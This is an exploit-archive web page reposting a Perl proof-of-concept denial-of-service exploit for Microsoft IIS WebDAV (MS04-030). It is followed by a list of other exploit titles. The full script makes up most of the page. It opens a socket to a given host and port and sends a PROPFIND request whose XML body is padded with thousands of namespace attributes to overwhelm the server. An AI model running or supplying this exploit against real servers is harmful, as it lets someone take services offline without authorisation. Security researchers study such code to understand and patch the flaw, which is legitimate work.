exploits , vulnerabilities , articles , Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)

2004-10-20

Microsoft IIS WebDAV XML Denial of Service Exploit (MS04-030)

 

CAN-2003-0718

#!/usr/bin/perl
# IIS BlowOut 
# POC exploit for MS04-030. Found by Amit Klein. 
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count .
"=\"xml:\" "; 

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind
xmlns:a=\"DAV:\" " . 
$xmlatt . 
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: 
$host\nContent-length: $l\n\n$xmldata\n\n"; 

syswrite($socket,$req,length($req));

close $socket;


securitydot.net - 2004-10-20

Exploits - newest 10 RSS | More

2007-06-15 55541 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32894 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40944 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28530 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19086 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16137 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18754 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16034 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32700 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16660 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit